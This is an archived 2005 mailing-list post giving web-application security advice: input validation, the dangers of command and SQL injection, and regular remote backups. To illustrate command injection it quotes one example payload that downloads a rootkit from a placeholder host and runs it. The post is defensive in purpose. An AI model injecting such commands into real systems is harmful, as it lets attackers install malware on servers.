[thelist] Securing a Web Application

Anthony Ettinger apwebdesign at yahoo.com
Tue Oct 18 19:33:25 CDT 2005


Also parameter checking is important.

For example, don't pass form input to the command
line.

someone could inject commnands like "wget
url.to.root.kit; ./root.kit;"

This is how my forums were taken down a year ago with
a phpbb bug.

same goes for sql injection as well, for example
passing sql comments + destructive queries as input.

You want a very restrictive test of the user input,
allowing only valid data, rejecting everything else.
This alone can be dedicated to an entire book.


also, at the VERY VERY least, backup your data 
remotely on a regular basis (I do it every 2 hours). 

That goes for the files and the database server as
well.

If you have access to a backup linux box either at
home or on the server, you can cronjob a good backup
utility and forget about it: www.rsnapshot.org

There's a database backup script for it which should
be in the cvs repository if it's not included in the
distribution file.



Anthony Ettinger
ph: (408) 656-2473
web: http://www.apwebdesign.com


More information about the thelist mailing list